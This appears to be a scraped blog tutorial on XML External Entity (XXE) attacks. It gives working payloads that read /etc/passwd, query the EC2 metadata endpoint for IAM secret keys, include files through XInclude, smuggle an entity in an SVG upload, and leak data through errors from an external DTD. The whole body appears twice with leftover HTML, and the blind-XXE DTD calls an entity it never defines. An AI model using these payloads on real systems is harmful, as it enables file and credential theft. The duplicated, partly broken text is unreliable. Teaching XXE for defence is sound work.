The basics of XML<\/h2>\n\n\n\n
Like JSON, XML is a language that can be used for storing and transportation of data. It follows tree-like structure for data representation.<\/p>\n\n\n\n
XML entities<\/h2>\n\n\n\n
Entities are the way by which the data can be represented in XML.<\/p>\n\n\n\n
Document type definition [DTD]<\/h2>\n\n\n\n
DTD defines the structure and legal elements and attributes of an XML document. Like I said XML can be used for transporting data, there should be a common standard accepted by everyone. Therefore, a DTD helps to check the validity of an XML document. DTDs can be both internal as well as external.<\/p>\n\n\n\n
Internal DTD with elements<\/h3>\n\n\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE todo [\n<!ELEMENT todo (name)>\n<!ELEMENT name (#PCDATA)>\n]>\n<todo>\n<name>Go to gym<\/name>\n<\/todo><\/code><\/pre>\n\n\n\nThe example defines a DOCTYPE named todo which contains a name of todo. So thats the format we have defined. And the xml document is expected to follow the defined structure.<\/p>\n\n\n\n
Elements are actual markup tags defined by the DTD, just like HTML’s <p> or <h1><\/p>\n\n\n\n
<name><\/name> is a user defined element.<\/p>\n\n\n\n
If you are wondering what is #PCDATA, hold on for a while. I will cover its significance later in this post.<\/p>\n\n\n\n
Internal DTD with entities<\/h3>\n\n\n\n<!DOCTYPE foobar [ <!ENTITY test \"Test123\" > ]><\/code><\/pre>\n\n\n\nThis is a DTD with an entity, declared with name test and its value is “Test123”. Now this entity can be referenced in the XML document with &. Ex.<\/p>\n\n\n\n
<lol>&test;<\/lol><\/code><\/pre>\n\n\n\nWhenever the XML document will be parsed, Test123 will be reflected.<\/p>\n\n\n\n
Parameter Entities<\/h3>\n\n\n\n
Parameter entities behave like and are declared almost exactly like a general entity. However, they use a % instead of an &, and they can only be used in a DTD while general entities can only be used in the document content.<\/p>\n\n\n\n
Syntax<\/p>\n\n\n\n
<!ENTITY % name \"foobar\"><\/code><\/pre>\n\n\n\nDeferencing<\/p>\n\n\n\n
<!ELEMENT employee (%name;)><\/code><\/pre>\n\n\n\nParameter entities are useful when entities have to be nested in DOCTYPE element. Parameter entities are significantly used to exploit <\/a>Blind XXE with out-of-band-interaction<\/a>.<\/span> We’ll see the usage in detail in the follow-up post.<\/a> <\/span><\/p>\n\n\n\nThat builds the fundamentals. Now comes the attack – XXE<\/p>\n\n\n\n
So lets understand what is XXE and how it happens.<\/p>\n\n\n\n
What is XXE <\/h2>\n\n\n\n
XXE (External XML Entity) is a vulnerability that allows the adversary to maliciously interact with the parsing of xml data. With a successful XXE attack, an attacker will be able to view server’s sensitive files like \/etc\/passwd. <\/p>\n\n\n\n
Wondering how? Lets take an example.<\/p>\n\n\n\n
<!DOCTYPE foo [ <!ENTITY malxxe SYSTEM \"file:\/\/\/path\/to\/file\" > ]>\n\n<\/code><\/pre>\n\n\n\nEntity malxxe is defined that uses SYSTEM identifier. A system identifier is nothing but a URI (Uniform resource identifier). file:\/\/\/path\/to\/file is a URI. When &malxxe; is referenced in any element, the contents of file are displayed.<\/p>\n\n\n\n
XXE can also be leveraged with other attacks such as SSRF to further increase the impact of compromise. <\/p>\n\n\n\n
XXE attacks arise when the XML parsers are poorly configured. <\/p>\n\n\n\n
There are multiple risk factors that can potentially be an entry point for XXE<\/h2>\n\n\n\n- If the application is parsing XML documents.<\/li>
- Malfored data is allowed in SYSTEM identifier within DTD<\/li>
- The XML processor is configured to validate and process the DTD.<\/li>
- The XML processor is configured to resolve external entities within DTD.<\/li><\/ul>\n\n\n\n
Attacks<\/h2>\n\n\n\n
I discussed about a basic snippet of DTD that can lead to XXE. Lets see that in action. I’ll be referencing various labs from portswigger to explain different XXE scenarios.<\/p>\n\n\n\n
XXE using external entities<\/h2>\n\n\n\n
There is an application, that uses XML data in the request to check the price of stock.<\/p>\n\n\n\n
Body of original request<\/p>\n\n\n\n
<stockcheck>\n<productId>1234<\/productId>\n<storeId>1<\/storeId>\n<\/stockcheck><\/code><\/pre>\n\n\n\nIf the xml parsers are weakly configured, an external entity can be inserted and can be referenced in the tags that were part of the original request. Since the parser parses the document and reflects the result in the response, referencing a malformed entity can retrieve sensitive files.<\/p>\n\n\n\n
Lets see how<\/p>\n\n\n\n![\"\"](\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/image.png\")
<\/figure>\n\n\n\nEntity xxe has the URI file:\/\/\/etc\/passwd and referencing it in the <productId> reflects the contents of \/etc\/passwd<\/p>\n\n\n\n
Checkout another example in Aragog from hackthebox<\/a><\/span><\/strong><\/span> where the privilege of file read can lead to initial foothold on the box.<\/p>\n\n\n\nXXE to perform SSRF<\/h2>\n\n\n\n
If an application is vulnerable to XXE, It can be further used for querying the internal network (not accessible from public but accessible from the application vulnerable to XXE) for sensitive information.<\/p>\n\n\n\n
Ex: There is a simulated EC2 metsdata endpoint at the URL : http:\/\/169.254.169.254\/ <\/p>\n\n\n\n
The application vulnerable to XXE can query this endpoint. The task is to read the server’s IAM secret access key.<\/p>\n\n\n\n![\"\"](\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/image-1-1024x346.png\")
<\/figure>\n\n\n\nNotice that just the URL is changed. Rest of the definition remains the same. The URL has to be contructed by viewing the response obtained after each slash(\/). Refer to aws documentations to get insights around the keywords used.<\/p>\n\n\n\n
Exploiting Xinclude to retrieve files<\/h2>\n\n\n\n
Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service. In this scenario, you cant define a DOCTYPE element.<\/p>\n\n\n\n
Here comes Xinclude to the rescue. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. It can be placed within any data value in XML.<\/p>\n\n\n\n
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:<\/p>\n\n\n\n
<foo xmlns:xi=\"http:\/\/www.w3.org\/2001\/XInclude\"><xi:include parse=\"text\" href=\"file:\/\/\/etc\/passwd\"\/><\/foo><\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/image-2-1024x424.png\")
<\/figure>\n\n\n\nXXE via file upload<\/h2>\n\n\n\n
This usecase is one of my favourites. I was just amazed with the attack possibilities with file uploads.<\/p>\n\n\n\n
Here, the application uses Apache Batik library to process avatar image files. The catch here is : Even if the image uploads allow format like png or jpeg only, there might be a possiblity that library supports SVG images. And SVG used XML. So now, an attacker can submit a malicious SVG image to load sensitive content inside image.<\/p>\n\n\n\n
xxe.svg file<\/p>\n\n\n\n
<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:\/\/\/etc\/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;<\/text><\/svg><\/code><\/pre>\n\n\n\nXXE via modified content type<\/h2>\n\n\n\n
POST requests a default content type ie application\/x-www-form-urlencoded. Some websites expect the request in this format but will also allow other content types including XML.<\/p>\n\n\n\n
Normal Request<\/p>\n\n\n\n
POST \/action HTTP\/1.0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 7\n\nfoo=bar<\/code><\/pre>\n\n\n\nWith XML<\/p>\n\n\n\n
POST \/action HTTP\/1.0\nContent-Type: text\/xml\nContent-Length: 52\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>bar<\/foo><\/code><\/pre>\n\n\n\nIf the application accepts the request with XML and parses the body as XML, then reformatiing the request can lead to XXE.<\/p>\n\n\n\n
Blind XXE<\/h2>\n\n\n\n
Situations where you see that requests contain the data in XML format but its no where reflected in the response, It can get difficult to understand if its vulnernable to XXE or not. Also with no data reflection in response, data retrieval becomes difiicult. Therefore in such scenarios OAST techniques are used. That is yet another topic to discuss. You can find the post here<\/a><\/span>.<\/p>\n\n\n\nIn scope of this post, I will talk about a workaround that is possible to get data reflection even when exploiting blnd XXE.<\/p>\n\n\n\n
Blind XXE to retrieve data via error messages<\/h2>\n\n\n\n
The trick here is to trigger an XML parsing error and load sensitive data as a part of error message. This only works if application returns error message in response.<\/p>\n\n\n\n
Here we create an external DTD that when imported, will try to read the contents of \/etc\/passwd into file entity and try to use that in file path.<\/p>\n\n\n\n
<!ENTITY % file SYSTEM \"file:\/\/\/etc\/passwd\"><!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:\/\/\/invalid\/%file;'>\">\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\nThis is stored in burp’s exploit server. You can use your own server too.<\/p>\n\n\n\n![\"\"](\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/image-3-1024x442.png\")
<\/figure>\n\n\n\nNotice where the %xxe; is called. It is an incorrect format and is gonna trigger an error. And the external dtd defined contains the logic for retrieving sensitive information along with error.<\/p>\n\n\n\n
Mitigations<\/h2>\n\n\n\n
No doubt, that XXE is a critical vulnerability to have in your application, but it can be prevented to certain extent when correct measures are taken.<\/p>\n\n\n\n
- DTD, enternal entities feature should be disabled.<\/li>
- XML processors, libraries used must be patched.<\/li>
- Validate user inputs before parsing<\/li>
- Validate, sanitise URLs to prevent SSRF<\/li>
- Use less complex data formats such as JSON<\/li><\/ul>\n\n\n\n
Thats all for this blog post! See you in the next one! <\/p>\n\n\n\n
Until then, Happy hunting! \ud83d\ude42<\/p>\n\n\n\n
References<\/h2>\n\n\n\n
<?xml version=\"1.0\"?>\n<!DOCTYPE todo [\n<!ELEMENT todo (name)>\n<!ELEMENT name (#PCDATA)>\n]>\n<todo>\n<name>Go to gym<\/name>\n<\/todo><\/code><\/pre>\n\n\n\nThe example defines a DOCTYPE named todo which contains a name of todo. So thats the format we have defined. And the xml document is expected to follow the defined structure.<\/p>\n\n\n\n
Elements are actual markup tags defined by the DTD, just like HTML’s <p> or <h1><\/p>\n\n\n\n
<name><\/name> is a user defined element.<\/p>\n\n\n\n
If you are wondering what is #PCDATA, hold on for a while. I will cover its significance later in this post.<\/p>\n\n\n\n
Internal DTD with entities<\/h3>\n\n\n\n<!DOCTYPE foobar [ <!ENTITY test \"Test123\" > ]><\/code><\/pre>\n\n\n\nThis is a DTD with an entity, declared with name test and its value is “Test123”. Now this entity can be referenced in the XML document with &. Ex.<\/p>\n\n\n\n
<lol>&test;<\/lol><\/code><\/pre>\n\n\n\nWhenever the XML document will be parsed, Test123 will be reflected.<\/p>\n\n\n\n
Parameter Entities<\/h3>\n\n\n\n
Parameter entities behave like and are declared almost exactly like a general entity. However, they use a % instead of an &, and they can only be used in a DTD while general entities can only be used in the document content.<\/p>\n\n\n\n
Syntax<\/p>\n\n\n\n
<!ENTITY % name \"foobar\"><\/code><\/pre>\n\n\n\nDeferencing<\/p>\n\n\n\n
<!ELEMENT employee (%name;)><\/code><\/pre>\n\n\n\nParameter entities are useful when entities have to be nested in DOCTYPE element. Parameter entities are significantly used to exploit <\/a>Blind XXE with out-of-band-interaction<\/a>.<\/span> We’ll see the usage in detail in the follow-up post.<\/a> <\/span><\/p>\n\n\n\nThat builds the fundamentals. Now comes the attack – XXE<\/p>\n\n\n\n
So lets understand what is XXE and how it happens.<\/p>\n\n\n\n
What is XXE <\/h2>\n\n\n\n
XXE (External XML Entity) is a vulnerability that allows the adversary to maliciously interact with the parsing of xml data. With a successful XXE attack, an attacker will be able to view server’s sensitive files like \/etc\/passwd. <\/p>\n\n\n\n
Wondering how? Lets take an example.<\/p>\n\n\n\n
<!DOCTYPE foo [ <!ENTITY malxxe SYSTEM \"file:\/\/\/path\/to\/file\" > ]>\n\n<\/code><\/pre>\n\n\n\nEntity malxxe is defined that uses SYSTEM identifier. A system identifier is nothing but a URI (Uniform resource identifier). file:\/\/\/path\/to\/file is a URI. When &malxxe; is referenced in any element, the contents of file are displayed.<\/p>\n\n\n\n
XXE can also be leveraged with other attacks such as SSRF to further increase the impact of compromise. <\/p>\n\n\n\n
XXE attacks arise when the XML parsers are poorly configured. <\/p>\n\n\n\n
There are multiple risk factors that can potentially be an entry point for XXE<\/h2>\n\n\n\n- If the application is parsing XML documents.<\/li>
- Malfored data is allowed in SYSTEM identifier within DTD<\/li>
- The XML processor is configured to validate and process the DTD.<\/li>
- The XML processor is configured to resolve external entities within DTD.<\/li><\/ul>\n\n\n\n
Attacks<\/h2>\n\n\n\n
I discussed about a basic snippet of DTD that can lead to XXE. Lets see that in action. I’ll be referencing various labs from portswigger to explain different XXE scenarios.<\/p>\n\n\n\n
XXE using external entities<\/h2>\n\n\n\n
There is an application, that uses XML data in the request to check the price of stock.<\/p>\n\n\n\n
Body of original request<\/p>\n\n\n\n
<stockcheck>\n<productId>1234<\/productId>\n<storeId>1<\/storeId>\n<\/stockcheck><\/code><\/pre>\n\n\n\nIf the xml parsers are weakly configured, an external entity can be inserted and can be referenced in the tags that were part of the original request. Since the parser parses the document and reflects the result in the response, referencing a malformed entity can retrieve sensitive files.<\/p>\n\n\n\n
Lets see how<\/p>\n\n\n\n<\/figure>\n\n\n\nEntity xxe has the URI file:\/\/\/etc\/passwd and referencing it in the <productId> reflects the contents of \/etc\/passwd<\/p>\n\n\n\n
Checkout another example in Aragog from hackthebox<\/a><\/span><\/strong><\/span> where the privilege of file read can lead to initial foothold on the box.<\/p>\n\n\n\nXXE to perform SSRF<\/h2>\n\n\n\n
If an application is vulnerable to XXE, It can be further used for querying the internal network (not accessible from public but accessible from the application vulnerable to XXE) for sensitive information.<\/p>\n\n\n\n
Ex: There is a simulated EC2 metsdata endpoint at the URL : http:\/\/169.254.169.254\/ <\/p>\n\n\n\n
The application vulnerable to XXE can query this endpoint. The task is to read the server’s IAM secret access key.<\/p>\n\n\n\n<\/figure>\n\n\n\nNotice that just the URL is changed. Rest of the definition remains the same. The URL has to be contructed by viewing the response obtained after each slash(\/). Refer to aws documentations to get insights around the keywords used.<\/p>\n\n\n\n
Exploiting Xinclude to retrieve files<\/h2>\n\n\n\n
Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service. In this scenario, you cant define a DOCTYPE element.<\/p>\n\n\n\n
Here comes Xinclude to the rescue. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. It can be placed within any data value in XML.<\/p>\n\n\n\n
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:<\/p>\n\n\n\n
<foo xmlns:xi=\"http:\/\/www.w3.org\/2001\/XInclude\"><xi:include parse=\"text\" href=\"file:\/\/\/etc\/passwd\"\/><\/foo><\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\nXXE via file upload<\/h2>\n\n\n\n
This usecase is one of my favourites. I was just amazed with the attack possibilities with file uploads.<\/p>\n\n\n\n
Here, the application uses Apache Batik library to process avatar image files. The catch here is : Even if the image uploads allow format like png or jpeg only, there might be a possiblity that library supports SVG images. And SVG used XML. So now, an attacker can submit a malicious SVG image to load sensitive content inside image.<\/p>\n\n\n\n
xxe.svg file<\/p>\n\n\n\n
<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:\/\/\/etc\/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;<\/text><\/svg><\/code><\/pre>\n\n\n\nXXE via modified content type<\/h2>\n\n\n\n
POST requests a default content type ie application\/x-www-form-urlencoded. Some websites expect the request in this format but will also allow other content types including XML.<\/p>\n\n\n\n
Normal Request<\/p>\n\n\n\n
POST \/action HTTP\/1.0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 7\n\nfoo=bar<\/code><\/pre>\n\n\n\nWith XML<\/p>\n\n\n\n
POST \/action HTTP\/1.0\nContent-Type: text\/xml\nContent-Length: 52\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>bar<\/foo><\/code><\/pre>\n\n\n\nIf the application accepts the request with XML and parses the body as XML, then reformatiing the request can lead to XXE.<\/p>\n\n\n\n
Blind XXE<\/h2>\n\n\n\n
Situations where you see that requests contain the data in XML format but its no where reflected in the response, It can get difficult to understand if its vulnernable to XXE or not. Also with no data reflection in response, data retrieval becomes difiicult. Therefore in such scenarios OAST techniques are used. That is yet another topic to discuss. You can find the post here<\/a><\/span>.<\/p>\n\n\n\nIn scope of this post, I will talk about a workaround that is possible to get data reflection even when exploiting blnd XXE.<\/p>\n\n\n\n
Blind XXE to retrieve data via error messages<\/h2>\n\n\n\n
The trick here is to trigger an XML parsing error and load sensitive data as a part of error message. This only works if application returns error message in response.<\/p>\n\n\n\n
Here we create an external DTD that when imported, will try to read the contents of \/etc\/passwd into file entity and try to use that in file path.<\/p>\n\n\n\n
<!ENTITY % file SYSTEM \"file:\/\/\/etc\/passwd\"><!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:\/\/\/invalid\/%file;'>\">\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\nThis is stored in burp’s exploit server. You can use your own server too.<\/p>\n\n\n\n<\/figure>\n\n\n\nNotice where the %xxe; is called. It is an incorrect format and is gonna trigger an error. And the external dtd defined contains the logic for retrieving sensitive information along with error.<\/p>\n\n\n\n
Mitigations<\/h2>\n\n\n\n
No doubt, that XXE is a critical vulnerability to have in your application, but it can be prevented to certain extent when correct measures are taken.<\/p>\n\n\n\n
- DTD, enternal entities feature should be disabled.<\/li>
- XML processors, libraries used must be patched.<\/li>
- Validate user inputs before parsing<\/li>
- Validate, sanitise URLs to prevent SSRF<\/li>
- Use less complex data formats such as JSON<\/li><\/ul>\n\n\n\n
Thats all for this blog post! See you in the next one! <\/p>\n\n\n\n
Until then, Happy hunting! \ud83d\ude42<\/p>\n\n\n\n
References<\/h2>\n\n\n\n